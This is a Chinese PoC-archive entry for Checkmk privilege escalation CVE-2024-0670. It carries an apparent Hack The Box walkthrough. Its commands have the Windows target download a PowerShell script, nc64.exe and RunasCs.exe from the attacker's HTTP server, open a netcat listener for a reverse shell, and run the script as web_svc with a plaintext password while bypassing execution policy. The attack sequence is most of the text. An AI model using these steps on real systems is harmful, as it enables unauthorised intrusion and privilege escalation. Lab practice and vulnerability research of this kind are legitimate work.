关联漏洞
标题:Checkmk 安全漏洞 (CVE-2024-0670)描述:Checkmk是一个编辑器。 Checkmk存在安全漏洞,该漏洞源于存在权限提升漏洞,允许本地用户升级权限。受影响的产品和版本:Checkmk 2.2.0p23之前版本,2.1.0p40之前版本,2.0.0 (EOL)之前版本。
介绍
# checkmk_cve-2024-0670
┌──(root㉿kali)-[/HTB/NanoCorp]
└─# python3 -m http.server 80
PS C:\windows\temp> iwr http://10.10.16.10/zh.ps1 -outfile "c:\windows\temp\zh.ps1"
PS C:\windows\temp> iwr http://10.10.16.10/nc64.exe -outfile "c:\windows\temp\nc64.exe"
PS C:\windows\temp> iwr http://10.10.16.10/RunasCs.exe -outfile "c:\windows\temp\RunasCs.exe"
┌──(root㉿kali)-[/HTB/NanoCorp]
└─# rlwrap -cAr nc -lvnp 8888
PS C:\windows\temp> .\RunasCs.exe web_svc "dksehdgh712!@#" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -File
C:\Windows\Temp\zh.ps1"
文件快照
[4.0K] /data/pocs/eea9e80ab6144b38182ce5db74bf3b43f574ebeb
├── [ 719] README.md
└── [2.4K] zh.ps1
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。